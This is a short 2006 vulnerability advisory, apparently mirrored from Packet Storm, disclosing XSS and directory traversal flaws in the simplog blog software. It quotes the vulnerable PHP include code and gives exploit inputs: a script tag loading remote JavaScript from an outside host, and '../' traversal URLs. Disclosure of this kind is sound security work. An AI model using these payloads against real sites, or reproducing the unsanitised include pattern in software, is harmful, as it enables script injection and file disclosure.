Lucene search
K

simplogsploit.txt

🗓️ 08 Mar 2006 00:00:00Reported by retardType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

simplog <= 1.0.2, medium risk xss and directory transversa

Code
`  
——–summary  
software: simplog  
vendors website: http://daverave.64digits.com/home.php?page=simplog  
versions: <= 1.0.2  
class: remote  
status: unpatched  
exploit: available  
solution: not available  
discovered by: retard and jim  
risk level: medium  
  
——– description  
simplog does not sanatise blog posts allowing users to insert  
html into posts causing a xss vulnerability. also, the application  
uses global variables for includes allowing users to include   
other .txt files than the inteded target  
  
in index.php:  
42 $act = $_GET['act'];   
43 if ($act == '')  
44 {  
45 include("blog.txt");  
46 }  
47 else  
48 {  
49 include("act/$act.txt");  
50 }   
  
——– exploit(s)  
xss:  
make any of your blog posts contain a script like below  
<SCRIPT SRC=http://notlegal.ws/xss.js></SCRIPT>  
  
directory transversal:  
http://example.com/index.php?act=blog&blogid=../somefile  
http://example.com/index.php?act=../somefile  
  
——– credit  
author(s): retard and jim  
email: [email protected]`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation